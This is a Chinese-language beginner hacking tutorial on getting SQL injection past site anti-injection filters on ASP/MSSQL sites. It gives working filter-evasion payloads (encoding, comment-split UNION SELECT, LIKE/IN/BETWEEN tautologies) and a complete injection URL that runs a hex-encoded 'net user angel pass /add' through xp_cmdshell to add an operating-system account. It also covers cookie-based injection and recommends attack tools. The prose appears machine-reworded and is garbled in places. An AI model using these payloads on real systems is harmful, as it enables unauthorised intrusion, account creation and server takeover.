绕过注入限制持续注入的一些办法（图）[菜鸟入门]

　　忽然想我们能否可以用什么办法绕过SQL注入的限制呢?到网上观察了一下,提到的办法大多都是针对AND与"'"号和"="号过滤的冲破,固然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果举行评论,但是可以必定的是,效果不会很好……
　　经过我的汇集,大部份的防注入程序都过滤了以下关键字:
　　and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
　　而这里最难处理的就是select这个关键字了,那么我们怎样来冲破他们呢?问题虽未完好办理,但还是说出来与大家分享一下,但愿能举一反三.
　　关于关键字的过滤,以下是我汇集的以及我个人的一些设法.
　　1、应用编码技术绕过
　　如URLEncode编码,ASCII编码绕过.比方or 1=1即%6f%72%20%31%3d%31,而Test也可认为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116).
　　2、通过空格绕过
　　如两个空格替换一个空格,用Tab替换空格等,大概删除全部空格,如or' swords' =‘swords' ,由于mssql的疏松性,我们可以把or 'swords' 之间的空格去掉,并不影响运行.
　　3、应用字符串判断替换
　　用经典的or 1=1判断绕过,如or 'swords' ='swords',这个办法就是网上在谈论的.
　　4、通过范例转换修饰符N绕过
　　可以说这是一个不错的设法,他除了能在某种程度上绕过限制,并且还有别的作用,大家自己好好想想吧.关于操纵,如or 'swords' = N' swords' ,大写的N奉告mssql server 字符串作为nvarchar范例,它起到范例转换的作用,并不影响注射语句本身,但是可以避过基于知识的情势匹配IDS.
　　5、通过+号拆解字符串绕过
　　效果值得考据,但毕竟是一种办法.如 or 'swords' =‘sw' +' ords' ;EXEC(‘IN' +' SERT INTO '+' …..' )
　　6、通过LIKE绕过
　　从前怎么就没想到呢?如or 'swords' LIKE 'sw'!!!明显可以很轻松的绕过"="">"的限制……
　　7、通过IN绕过
　　与上面的LIKE的思绪差不多,如or 'swords' IN ('swords')
　　8、通过BETWEEN绕过
　　如or 'swords' BETWEEN 'rw' AND 'tw'
　　9、通过>大概<绕过
　　or 'swords' > 'sw'
　　or 'swords' < 'tw'
　　or 1<3
　　……
　　10、应用注释语句绕过
　　用/**/替换空格,如:UNION /**/ Select /**/user,pwd,from tbluser
　　用/**/分割敏感词,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
　　11、用HEX绕过,普通的IDS都无法检测出来
　　0x730079007300610064006D0069006E00 =hex(sysadmin)
　　0x640062005F006F0077006E0065007200 =hex(db_owner)
　　别的,关于通用点的过滤办法,我们可以考虑采取赋值的办法,比方先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a终究履行我们输入的号令.变量a可以是任何号令.以下:
　　declare @a sysname
　　select @a=
　　exec master.dbo.xp_cmdshell @a
　　效果http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname
　　%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--
　　此中的 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 就是"net user angel pass /add"的意思.
　　12.当防注入系统禁止了注入时,可尝试利用request.cookie方法举行注入!普通网站防注入系统不会对用这种方法提交上来的数据举行过滤!（貌似说的不够具体,下面我来增补）
　　--------------------------------------------------------------------------------------------
　　别的的办法:
　　1、有些站的防注入系统有缺陷,起不到很好的防注入功效,可以被简单的绕过.比方这个的参数asp?id=123 你可以把id转化为%69%64 然后把地址填进注入工具便可以持续注入了.
　　2、还有的防注入系统会把不法提交的参数举行记录,然后写入到asp文件中,这样做的后果会招致被写入一句话木马,留下了新的安全隐患.
　　关于cookie注入是一个对比好的绕过注入防护持续注入的办法,原理就是request.cookie提交的数据普通不会被过滤,你可以手工举行（网上教程很多,不懂得的可以搜索下）,当然对比麻烦;别的你也可以利用工具.如一些支持cookie改正功效的浏览器,加上SQL语句举行注入,还有孤单的刺猬写的这个小工具（ps:要的可以留言,最新的版本哦）间接通过注入工具注入,别的险恶八进制上了有人发的一个PHP写的支持cookie注入的工具,其实就是一个PHP脚本（我的站上有）.还有蝉之刃1.5也支持cookie注入,本人没怎么利用,感受不大好用,实际效果没怎么测试.

　　以上是“绕过注入限制持续注入的一些办法（图）[菜鸟入门]”的内容，如果你对以上该文章内容感兴趣，你可以看看七道奇为您推荐以下文章：